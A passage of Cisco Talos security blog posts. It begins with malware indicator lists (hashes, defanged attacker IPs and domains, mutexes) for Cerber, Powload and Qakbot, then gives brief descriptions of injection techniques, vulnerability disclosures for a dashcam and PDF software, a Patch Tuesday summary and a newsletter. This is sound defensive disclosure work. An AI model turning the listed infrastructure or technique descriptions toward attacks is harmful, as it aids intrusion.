  • 6059747fb8a2c5429313d835f610d9c4a6965c5f63719c694ba20533450da3f7
  • 605cbd5701cbbc4a36935599525e6d0d5c1a043c9252aa081cb9c2f3724fc8ba
  • 613531d0a4eeffaca1e34fc90de6ce2a042dac8983fe8ac30d5868f2d400d4e2
  • 619b34db1e2b672ab7709c581a43ecc902b4f36fc817c007cd557b75d7dc67bf
  • 64c06234473e62abe6b4dd9dcb8c0df812344f4808fa8d2c594e3117bb22ac8e
  • 6503fd5020dc940cb38a647c1d6ee211259e418593d6bdf9db3aeb79621a4a6c
  • 6859d6615d5de8f981ee996de57b6f2c838420c2b21cf328b8a258a500e2ebc5
  • 6921860fd202f8de479af08511a6b5ddfb9c84654a89020f133243cebf0bee9a
  • 693df72f101e68cb4a19a921c89301779552e4215830498bc8b5c7843e35e5e2
  • 6a2a3089e6adf58b64a3800b94bc53d0e2b6b05a21aa6127ce57620268b49f08
  • 70c258ff7c21f6319d1434480d5ae6f2e111feb864a5e33b81b01f8364247d11
  • 70e53a2ffa43d9d4426fc703c04d7d610aa0346c2fb7e37dc234167c613dd515
  • 7149016c8e6cdeb9494dea17b743b298d12adbc35c77dcf7bc0a1e12f8ddea2d
  • 7246bf9b6fdb3b49ce33ff7b0a3f2bae33eb1e0301db635ccb74608313c719e1
  • 763571d4fc7e3d4738941599d41a665bcb859c0180de80ac99765edbe47f93a9
  • 7895313b35d27c7d5bc0fca556736f63e800e99feb6dcde910c76c743d4634ac
  • 79582a03488d2c8a1a14ce512034f65727e4a921f7420e18078d92bf1dd085ac
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella



Malware



Win.Ransomware.Cerber-6963958-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2 11
<HKLM>\System\CurrentControlSet\Control\Session Manager 11
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
11
<HKU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 10
<HKU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld 10
<HKU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 10
<HKU>\Software\Microsoft\Internet Explorer\IETld 10
<HKU>\Software\Microsoft\Internet Explorer\BrowserEmulation 10
<HKLM>\SOFTWARE\Microsoft\ESENT\Process\mshta\DEBUG 10
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}11
\BaseNamedObjects\shell.{D31FFF46-7264-2F11-86F6-D577904717A2}1
\BaseNamedObjects\shell.{009333F1-551C-9DAC-1759-5B4919375F70}1
\BaseNamedObjects\shell.{AC607669-1359-523E-095D-A88DA96FD1D1}1
\BaseNamedObjects\shell.{8F606D68-4B19-E718-0DBB-45B7697D4BDA}1
\BaseNamedObjects\shell.{4A4E1DA9-250C-6EB9-DF1C-D339CF8305B9}1
\BaseNamedObjects\shell.{93742F5C-F907-5D2F-E50F-7DDF1F2F0F9C}1
\BaseNamedObjects\shell.{98B816E3-E44E-C421-229A-B8F7963D0F05}1
\BaseNamedObjects\shell.{33BDE317-B098-C54C-1E87-AECB2544252C}1
\BaseNamedObjects\shell.{D98CB22B-6CC2-5E4F-BC2F-152CBBE6DA5B}1
\BaseNamedObjects\shell.{31C26804-8082-BCD2-AE9A-2E0E343C4A11}1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
94[.]23[.]173[.]23911
94[.]23[.]173[.]23611
94[.]23[.]173[.]23711
94[.]23[.]173[.]24211
94[.]23[.]173[.]24311
94[.]23[.]173[.]24011
94[.]23[.]173[.]24111
94[.]23[.]172[.]19011
94[.]23[.]173[.]2411
94[.]23[.]173[.]2511
94[.]23[.]173[.]12711
94[.]23[.]172[.]19111
94[.]23[.]174[.]7611
94[.]23[.]174[.]7711
94[.]23[.]172[.]21811
94[.]23[.]175[.]15311
94[.]23[.]175[.]15211
94[.]23[.]172[.]5011
94[.]23[.]172[.]5111
94[.]23[.]175[.]14211
94[.]23[.]175[.]14311
94[.]23[.]173[.]23511
94[.]23[.]173[.]23411
94[.]23[.]172[.]19911
94[.]23[.]172[.]19711
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com11
hjhqmbxyinislkkt[.]1j9r76[.]top8
chain[.]so6
p27dokhpz2n7nvgr[.]1j9r76[.]top3
bitaps[.]com3
btc[.]blockr[.]io3
Files and or directories createdOccurrences
%TEMP%\d19ab98911
%TEMP%\d19ab989\4710.tmp11
%TEMP%\d19ab989\a35f.tmp11
\DAV RPC SERVICE10
\Device\Null10
%TEMP%\8f793a96\4751.tmp10
%TEMP%\8f793a96\da80.tmp10
\I386\DRVMAIN.SDB10
\I386\EULA.TXT10
\I386\HWCOMP.DAT10
\I386\SECUPD.DAT10
\I386\SETUPLDR.BIN10
\I386\WIN9XMIG\ICM\SYMBOLS.PRI\RETAIL\DLL\MIGRATE.PDB10
\I386\WIN9XMIG\ICM\SYMBOLS\RETAIL\DLL\MIGRATE.PDB10
\I386\WIN9XMIG\IEMIG\SYMBOLS.PRI\RETAIL\DLL\MIGRATE.PDB10
\I386\WIN9XMIG\IEMIG\SYMBOLS\RETAIL\DLL\MIGRATE.PDB10
\I386\WIN9XMIG\PWS\SYMBOLS.PRI\RETAIL\DLL\MIGRATE.PDB10
\I386\WIN9XMIG\PWS\SYMBOLS\RETAIL\DLL\MIGRATE.PDB10
\I386\WIN9XUPG\E95ONLY.DAT10
File Hashes
  • 7019c1e1802915ac18691419d277a94b5e30a11209dd445f234ca14b35f5d720
  • 72316d031bea130d9475d57d97f96b05cf11190101b219b106eadbb7ffb41b4a
  • 8518d800daf5c94937948b6f1ca696a7e03faa6f86a689e809218f81f697b80e
  • 860ee1bc900c05313d12f50f17620c330f642a9dcfce66b8dd8141897bd4ed09
  • a8eb934ac833e714578d5d7d2b8fa2388328cb2145e8207553a0f124da942f48
  • ac4851b671d4ecf728681c9587bd7d14bc011c682e6957124aba87660882377c
  • bccbc893aef7ecee4eebeeb2c386e43abb1deaa78d4f03dc54e8f7f409d73b6f
  • c3e5d39b17b60def951d6c0829ed1bf887cc0e71c9d24c9dc14a02d6bdf23c86
  • cf557bc47899bdec8b94a0e8b0b00d73390be2c1c404a973b65828e264c26c77
  • e2e487d62c6c9ef0a965fbb0d99e0af7752a11738a9ef3e1d9d193862b28e118
  • f0e79e62922ddf62d71c4e44aa2e927ad111b4437df9adcf0c28c491b22d633a

Coverage


Screenshots of Detection

AMP



ThreatGrid



Malware



Doc.Downloader.Powload-6959926-0


Indicators of Compromise


Registry KeysOccurrences
N/A-
MutexesOccurrences
Global\I98B68E3C24
Global\M98B68E3C24
Global\SyncRootManager1
Local\ShimViewer1
Local\C9E8AF12-FA27-4748-EC04-38CA71239739_RegisterDevice1
5CAC3FAB-87F0-4750-984D-D50144543427-VER151
Local\{F99C425F-9135-43ed-BD7D-396DE488DC53}1
CicLoadWinStaWinSta01
Global\RecentDocumentsUpdate1
Global\b48161dd-6c92-11e9-bdf9-00501e3ae7b51
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
37[.]211[.]38[.]5022
75[.]177[.]169[.]22522
50[.]99[.]132[.]722
189[.]134[.]78[.]4221
31[.]14[.]103[.]16412
91[.]231[.]87[.]7812
45[.]40[.]251[.]24312
103[.]229[.]72[.]5910
209[.]134[.]25[.]1703
200[.]58[.]171[.]512
189[.]196[.]140[.]1872
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
protemin[.]com12
moda-blog[.]com12
chenrenxu[.]com12
depobusa[.]com10
webaphobia[.]com3
Files and or directories createdOccurrences
%HOMEPATH%\820.exe12
%HOMEPATH%\438.exe10
%HOMEPATH%\813.exe3
\TDLN-2060-411
\Device\NamedPipe\Sessions\1\AppContainerNamedObjects\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-26303127421
%System32%\WindowsPowerShell\v1.0\Help.format.ps1xml1
%SystemRoot%\SysWOW64\7Dvm.exe1
%TEMP%\CVR550.tmp1
%SystemRoot%\SysWOW64\9LObZfUjohYq.exe1
File Hashes
  • 07ad82ee6f552024b89e9569759078672295762694af017f35f64bb7284b93c3
  • 1a6641086b78035d6c9ba38c7199aac02d37dafbadf96059a81b6f4c35e49f84
  • 1f4a46bf19d090bee1282d5920e1ce502620c0a50cb4d5165d735d5b52e4a79e
  • 224d99639dbb488494e23f7fd8a60c75630ffc694a3114a6d4f596da2062fbe0
  • 2ade167cc02b318750feb789c0476581e4f2e0864c3a51fd65bd74c25534a74e
  • 3606c54dbaba863109929191dfda5771de069a4fdbdc6322ae75c549aeec3ddd
  • 394d047267664ca7feaa87df65b83ef559a4a97d7660e855fd84ad39ca15c17f
  • 3f832fc27ebcc0391c302aedbc3f8d3dfe7473679d5d9aa0176f9623d4306d68
  • 3f90bc319f969145e499fa90a32a81f0fed988320b255b0febc18befca735484
  • 404f20fabcaf9c4c086a38eb1cb139e49e2e08d6249ef41b88d7eb2c0e628bbc
  • 42981d37b50801d5cdc23d5d9f0a1e0e20f3787e24c4d20f606d2250ce5bf804
  • 438757f58f956c0bf3c4d88c3270f25c6bef6cc6c7599d01e2050871e1c7cced
  • 49b5e70a242f984eadee49435aac4371ca3cb65b02b2f6fbcbfcbfbd9d985782
  • 51d6fab6ccf8fb3460ce156af02cfcbaf6098f74d37e5d323a3d9e2c07e4b8f4
  • 567c4f99a489d6e26cdd76b719f290108f558cb49b7f5f7e2d84dc8929f7613b
  • 571210656adbfe8cde574bb15f96232169cdfb487f4597ce1a4532c7a0258f46
  • 58c44d575aa6041c0d0e87372288f96804c1fa141ee903a67f668e73cb690dec
  • 5f401aefe65751c9e09131d50f1a6ea3f86f542552ecab2973a334a360357699
  • 61e933a06b4a2af4239c378c84211b2ff1baab4effe6b5bf044ac4f2d3371c32
  • 64b75110604d920b41da5dedf56cabebac63da64a209a35cb664ba69764fb8a8
  • 68e686c3f2b87d3169766ffe4bba021a8acd7648ca38c6c75be829a864558ecb
  • 6a817c04b3ec3fb6f85801ecf4999db95505445ecbc8f741cf2985972f2d6f75
  • 6f926261cf70832a6f3332c727eb674da29212109a968a25cab4cb92fced7694
  • 72f28f83d17f71068693f8f34ea40d09dc75d111635427f1b58fa9d4cad29558
  • 7416ebc5373fd8a3ec9ece1dff46c15699738491d703b47f20ae4de8c59bcef0
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP




ThreatGrid



Umbrella



Malware



Win.Dropper.Qakbot-6962757-0


Indicators of Compromise


Registry KeysOccurrences
N/A-
MutexesOccurrences
Global\eqfik15
Global\ufwao15
llzeou15
4737f7e7a483154476a69b4f5a4a1
4737f7e7a483154476a69b4f5a4/C1
f23982a726efd837a3fb23d770ea1
85ff1bf1196b88d85f7f7092fc8a1
f23982a726efd837a3fb23d770e/C1
b274a28e4ad451b106c78e64d91a1
85ff1bf1196b88d85f7f7092fc8/C1
ecd2fdff63d752ee98eb1e0dd18a1
b274a28e4ad451b106c78e64d91/C1
ecd2fdff63d752ee98eb1e0dd18/C1
8c5f802a24045fc230207298aa8a1
8c5f802a24045fc230207298aa8/C1
908889c25ce86b55fc08b790b42a1
666d680dfc69cb8931cc724a81ca1
908889c25ce86b55fc08b790b42/C1
666d680dfc69cb8931cc724a81c/C1
d7c6d675543ec8fc13cb6e169f7a1
d7c6d675543ec8fc13cb6e169f7/C1
a4be182a1dc5815e8a932795631a1
a4be182a1dc5815e8a932795631/C1
99cfbb31846bd275123aa1ab920a1
99cfbb31846bd275123aa1ab920/C1
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Files and or directories createdOccurrences
N/A-
File Hashes
  • 4737f7e7a483154476a69b4f5a48fb4551ac02ac240a784c4f3377c436dbd203
  • 666d680dfc69cb8931cc724a81cdb588d16602788f7d3bd7955803ce224d6f80
  • 6c4d27124a279c0f49eb46852ea440fdd482bd8798126bfe0b526361f3702531
  • 85ff1bf1196b88d85f7f7092fc8f3905a9ded0e14e06b17475163df47a079e29
  • 8c5f802a24045fc230207298aa825e0fca94d7dd7d8e9f06abd59836d0ed373e
  • 908889c25ce86b55fc08b790b42ab405a485dc498821249c10d5517c47470e35
  • 9258e1004f3ddbf9bc72a4764a77d174b090faf1288afaa2f7b1d16f96fbb1a6
  • 99cfbb31846bd275123aa1ab9206e92b71556ea269e8eeceffff3b3dc27385b5
  • a4be182a1dc5815e8a9327956310222b714dac52ba4c5aa4ba0f72975c716218
  • b274a28e4ad451b106c78e64d917f9da3d1ab46d7e450a3a3908351b25718b3c
  • c6f26163d2c2dc499ffdb86d649e95301329db9d908888b909f4190d3d51ca1f
  • d7c6d675543ec8fc13cb6e169f7df286f33187ee96a3163252c607aa16e7bbf1
  • ecd2fdff63d752ee98eb1e0dd185a1919d2ff72c23c80a7a8c057d4b9f5e9ad5
  • f23982a726efd837a3fb23d770ed2e1eba1cf2629b4466b76ef205b52c19e540
  • f9d48c419ad4ea015efa8258f323a5242b46da80c1755ff2b551592a3b54d0bd

Coverage


Screenshots of Detection

AMP




ThreatGrid



Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
  • Madshi injection detected (3477)
    Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
  • Kovter injection detected (2818)
    A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
  • PowerShell file-less infection detected (1467)
    A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
  • Process hollowing detected (521)
    Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
  • Gamarue malware detected (172)
    Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
  • Atom Bombing code injection technique detected (146)
    A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
  • Suspicious PowerShell execution detected (97)
    A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
  • Installcore adware detected (69)
    Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
  • Dealply adware detected (40)
    DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
  • Excessively long PowerShell command detected (26)
    A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

Vulnerability Spotlight: Multiple vulnerabilities in the Roav A1 Dashcam

$
0
0


Lilith Wyatt of Cisco Talos discovered these vulnerabilities.

Executive Summary 

Cisco Talos is disclosing multiple vulnerabilities in the Anker Roav A1 Dashcam and the Novatek NT9665X chipset. The Roav A1 Dashcam by Anker is a dashboard camera that allows users to connect using the Roav app for Android and iOS so that the users can toggle settings and download videos from the dashcam, along with a host of other features. These vulnerabilities could be leveraged by an attacker to gain arbitrary code execution on affected devices.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Novatek to ensure that some of these issues are resolved and that an update is available for affected customers. However, we were unable to contact Anker, therefore, TALOS-2018-0685, TALOS-2018-0687 and TALOS-2018-0688 remain unpatched.

Vulnerability Details

Anker Roav A1 Dashcam WifiCmd Code 9999 execution vulnerability (TALOS-2018-0685/CVE-2018-4014)

An exploitable code execution vulnerability exists in a Wifi Command of the Roav A1 Dashcam. A specially crafted packet can cause a stack-based buffer overflow. An attacker can send a packet to trigger this vulnerability, resulting in code execution on an affected device. For additional information, please see the advisory here.

Anker Roav A1 Dashcam stack overflow code execution vulnerability (TALOS-2018-0687/CVE-2018-4016)

The URL-parsing functionality of the Roav A1 Dashcam is vulnerable to code execution. A specially crafted packet can cause a stack-based buffer overflow. An attacker can send a packet to trigger this vulnerability, resulting in code execution on an affected device. For additional information, please see the advisory here.

Anker Roav A1 Dashcam Wifi AP default credential vulnerability (TALOS-2018-0688/CVE-2018-4017)

The Roav A1 Dashcam contains a default credential that can be exploited. The device uses a default password and does not require the user to change it. For additional information, please see the advisory here.

Novatek NT9665X HTTP upload firmware update vulnerability (TALOS-2018-0689/CVE-2018-4018)

An exploitable firmware update vulnerability exists in the NT9665X Chipset firmware, running on Anker Roav A1 Dashcam version "RoavA1_SW_V1.9". The HTTP server allows for arbitrary firmware binaries to be uploaded which will be flashed upon next reboot. An attacker can send an HTTP PUT request or upgrade firmware request to trigger this vulnerability. For additional information, please see the advisory here.

Novatek NT9665X XML_UploadFile path overflow code execution vulnerability
(TALOS-2018-0695/CVE-2018-4023)

An exploitable code execution vulnerability exists in the `XML_UploadFile` WiFi command of the NT9665X Chipset firmware, running on Anker Roav A1 Dashcam version "RoavA1_SW_V1.9". A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. For additional information, please see the advisory here.

Novatek NT9665X XML_GetThumbNail denial-of-service vulnerability (TALOS-2018-0696/CVE-2018-4024)

An exploitable denial-of-service vulnerability exists in the thumbnail display functionality of the NT9665X Chipset firmware, running on the Anker Roav A1 Dashcam, version "RoavA1_SW_V1.9". A specially crafted packet can cause a null pointer to dereference, resulting in a device reboot. For additional information, please see the advisory here.

Novatek NT9665X XML_GetRawEncJpg denial-of-service vulnerability (TALOS-2018-0697/CVE-2018-4025)

An exploitable denial of service vulnerability exists in the `XML_GetRawEncJpg` WiFi command of the NT9665X Chipset firmware, running on Anker Roav A1 Dashcam version "RoavA1_SW_V1.9". A specially crafted packet can cause an invalid memory to dereference, resulting in a device reboot. An attacker can send a packet to trigger this vulnerability. For additional information, please see the advisory here.

Novatek NT9665X XML_GetScreen Strncmp denial-of-service vulnerability (TALOS-2018-0698/CVE-2018-4026)

An exploitable denial-of-service vulnerability exists in the `XML_GetScreen` Wi-Fi command of the NT9665X Chipset firmware, running on the Anker Roav A1 Dashcam, version "RoavA1_SW_V1.9.” A specially crafted set of packets can cause an invalid memory to dereference, resulting in a device reboot. For additional information, please see the advisory here.

Novatek NT9665X XML_UploadFile WifiCmd denial-of-service vulnerability (TALOS-2018-0699/CVE-2018-4027)  

An exploitable denial-of-service vulnerability exists in the `XML_UploadFile` Wi-Fi command of the NT9665X Chipset firmware, running on the Anker Roav A1 Dashcam, version "RoavA1_SW_V1.9.” A specially crafted packet can cause a semaphore deadlock, which prevents the device from receiving any physical or network inputs. An attacker can send a specially crafted packet to trigger this vulnerability. For additional information, please see the advisory here.

Novatek NT9665X HFS overwrite denial-of-service vulnerability (TALOS-2018-0700/CVE-2018-4028)
     
An exploitable firmware update vulnerability exists in the NT9665X Chipset firmware running on the Anker Roav A1 Dashcam, version "RoavA1_SW_V1.9.” The HTTP server could allow an attacker to overwrite the root directory of the server, resulting in a denial of service. An attacker can send an HTTP POST request to trigger this vulnerability. When this denial-of-service vulnerability is paired up with TALOS-2018-0699, the Anker Dashcam is completely disabled until the battery runs out. For additional information, please see the advisory here.

Novatek NT9665X HFS Recv buffer overflow code execution vulnerability (TALOS-2018-0701/CVE-2018-4029)  

An exploitable code execution vulnerability exists in the HTTP request-parsing function of the NT9665X Chipset firmware running on the Anker Roav A1 Dashcam, version "RoavA1_SW_V1.9.” A specially crafted packet can cause an unlimited and arbitrary write to memory, resulting in code execution. For additional information, please see the advisory here.

Coverage

The following SNORTⓇ rules detect attempts to exploit TALOS-2018-0685, TALOS-2018-0699, TALOS-2018-0698, TALOS-2018-0697, TALOS-2018-0696, and TALOS-2018-0695. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 40866, 48250, 48251, 48253, 48254, 48255

Versions Tested

Talos has tested and confirmed that the following Roav A1 Dashcam versions are affected: Anker Roav A1 Dashcam version "RoavA1_SW_V1.9" and the Novatek NT9665X chipset firmware.


Microsoft Patch Tuesday — May 2019: Vulnerability disclosures and Snort coverage

$
0
0















Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 79 vulnerabilities, 22 of which are rated “critical," 55 that are considered "important" and one "moderate." This release also includes two critical advisories: one covering Microsoft Live accounts and another addressing updates to Adobe Flash Player.

This month’s security update covers security issues in a variety of Microsoft’s products, including the Scripting Engine, the Microsoft Edge web browser and GDI+. For more on our coverage of these bugs, check out the Snort blog post here, covering all of the new rules we have for this release.

Critical vulnerabilities

Microsoft disclosed 22 critical vulnerabilities this month, seven of which we will highlight below.

CVE-2019-0884, CVE-2019-0911 and CVE-2019-0918 are memory corruption vulnerabilities that exist in the scripting engine when it handles objects in memory in Microsoft browsers. These bugs could corrupt memory in a way that an attacker could gain the ability to remotely execute code in the context of the current user. An attacker could exploit these vulnerabilities by either tricking the user into opening a specially crafted web page while using a Microsoft web browser, or by embedding an ActiveX control marked "safe for initialization" in a specific application or Microsoft Office document that utilizes the browser rendering engine.

CVE-2019-0903 is a remote code execution vulnerability in the GDI+ API. An attacker could use the vulnerability to take complete control of the system and execute, install and delete programs in the context of the current user. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page or by convincing them to open a malicious email attachment.

CVE-2019-0926 is a memory corruption vulnerability in Microsoft Edge that exists when the web browser improperly accesses objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted web page in Edge. This would eventually allow the attacker to corrupt memory in a way that they could then remotely execute code in the context of the current user.

CVE-2019-0929 is a memory corruption vulnerability in Microsoft Internet Explorer that exists in the way the web browser handles objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted web page in Internet Explorer. This would eventually allow the attacker to corrupt memory in a way that they could then remotely execute code in the context of the current user.

CVE-2019-0708 is a remote code execution vulnerability in Remote Desktop Services – formerly known as Terminal Services. The vulnerability requires no user interaction and is pre-authentication. Microsoft specifically warned against this bug because it makes the vulnerability "wormable," meaning future malware that exploits this vulnerability could spread from system to system. An attacker could exploit this vulnerability by sending a specially crafted request to the target system's Remote Desktop Service via RDP. Research into coverage for this vulnerability is ongoing.

The other critical vulnerabilities are:

Important vulnerabilities

This release also contains 55 important vulnerabilities, one of which we will highlight below.

CVE-2019-0885 is a remote code execution vulnerability in Windows OLE that exists when OLE fails to properly validate user input. An attacker could exploit this bug in a way that would allow them to execute malicious code on the system. This bug can be exploited when a user opens a specially crafted file or program, leading Windows to execute the desired code.

The other important vulnerabilities are:

Moderate vulnerability

There is one moderate vulnerability, CVE-2019-0971, an information disclosure vulnerability in Azure DevOps.

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 50068 - 50091, 50115 - 50119, 50120 - 50122

Vulnerability Spotlight: Remote code execution vulnerabilities in Adobe Acrobat Reader

$
0
0


Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities.

Executive summary

There are two remote code execution vulnerabilities in Adobe Acrobat Reader that could occur if a user were to open a malicious PDF on their machine using the software. Acrobat is the most widely used PDF reader on the market, making the potential target base for these bugs fairly large. The program supports embedded JavaScript code in the PDF to allow for interactive PDF forms, giving the potential attacker the ability to precisely control memory layout and creating an additional attack surface.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC OCGs state change remote code execution vulnerability (TALOS-2018-0778/CVE-2019-7761)

A specific JavaScript code embedded in a PDF file can lead to a heap corruption when opening a PDF document in Adobe Acrobat Reader DC, version 2019.10.20069. This can lead to arbitrary code execution with careful memory manipulation. The victim would need to open the malicious file or access a malicious web page to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Adobe Acrobat Reader DC OCGs state change remote code execution vulnerability (TALOS-2019-0796/CVE-2019-7831)

A specific JavaScript code embedded in a PDF file can lead to a heap corruption when opening a PDF document in Adobe Acrobat Reader DC 2019.10.20098. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC, version 2019.010.20069 is affected by TALOS-2019-0778. TALOS-2019-0796 affects version 2019.010.20098.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294, 49189, 49190, 49684, 49685

Vulnerability Spotlight: Remote code execution bug in Antenna House Rainbow PDF Office document converter

$
0
0


Emmanuel Tacheau of Cisco Talos discovered this vulnerability.

Executive summary

A buffer overflow vulnerability exists in Antenna House’s Rainbow PDF when the software attempts to convert a PowerPoint document. Rainbow PDF has the ability to convert Microsoft Office 97-2016 documents into a PDF. This particular bug arises when the converter incorrectly checks the bounds of a particular function, causing a vtable pointer to be overwritten. This could allow an attacker to overflow the buffer and gain the ability to execute code remotely on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Antenna House to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Antenna House Rainbow PDF Office server document converter TxMasterStyleAtom parsing code execution vulnerability (TALOS-2019-0792/CVE-2019-5030)

A buffer overflow vulnerability exists in the PowerPoint document conversion function of Rainbow PDF Office Server Document Converter, version 7.0 Pro MR1 (7,0,2019,0220). While parsing a document text info container, the TxMasterStyleAtom::parse function is incorrectly checking the bounds corresponding to the number of style levels, causing a vtable pointer to be overwritten, which leads to code execution.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Rainbow PDF Office Server Document Converter, V7 Pro MR1 for Linux64 (7.0.2019.0220) is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 42076, 42077

Threat Source newsletter (May 16)

$
0
0

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We were packed with vulnerabilities this week. For starters, there’s Microsoft Patch Tuesday, which we’ll cover farther down. We also disclosed a remote code execution bug in Antenna House Rainbow PDF Converter, and two more in Adobe Acrobat Reader. There are also a number of vulnerabilities in the Roav A1 dashboard camera, as well as the chipset it utilizes.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Location: Industriens Hus, Copenhagen, Denmark
Date: May 29
Speaker: Paul Rascagnères
Synopsis: Paul will give an overview of an espionage campaign targeting the Middle East that we called “DNSpionage.” First, he will go over the malware and its targets and then talk about the process the attackers took to direct DNSs. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security.

Location: ILEC Conference Centre, London, England
Date: June 5
Speaker: Paul Rascagnères
Synopsis: Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it’s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker. 

Cyber Security Week in Review

  • Facebook released an emergency update for WhatsApp after attackers were able to completely take over devices with just a phone call. While many mobile malware families usually require the user to open some sort of file, this vulnerability allowed hackers to infect a device as soon as the user answered a phone call using WhatsApp.
  • An anonymous Twitter user claims to be selling access to documents stolen in the ransomware attack on Baltimore’s government. Nearly two weeks after the initial infection, many of the city’s online services are still disabled.
  • Twitter says a bug in its iOS app caused the social media platform to mistakenly leak users’ locations to a yet-to-be-named third party. The vulnerability only affected a small number of iOS users, the company said.
  • President Donald Trump signed a national emergency this week that bans Chinese tech companies from selling their products in the U.S. While the executive order does not name any specific companies, it is largely thought that the U.S. is specifically targeting Huawei and ZTE.
  • Google promised to replace all of its Titan security keys after a vulnerability was discovered in its Bluetooth pairing. The bug could allow an attacker to remotely communicate with the device and the device its paired with via Bluetooth.
  • Europol says it has dismantled the cybercrime group behind the GozNym banking trojan. The international police agency says they’ve charged 10 individuals so far with infecting and stealing money from more than 41,000 victims.
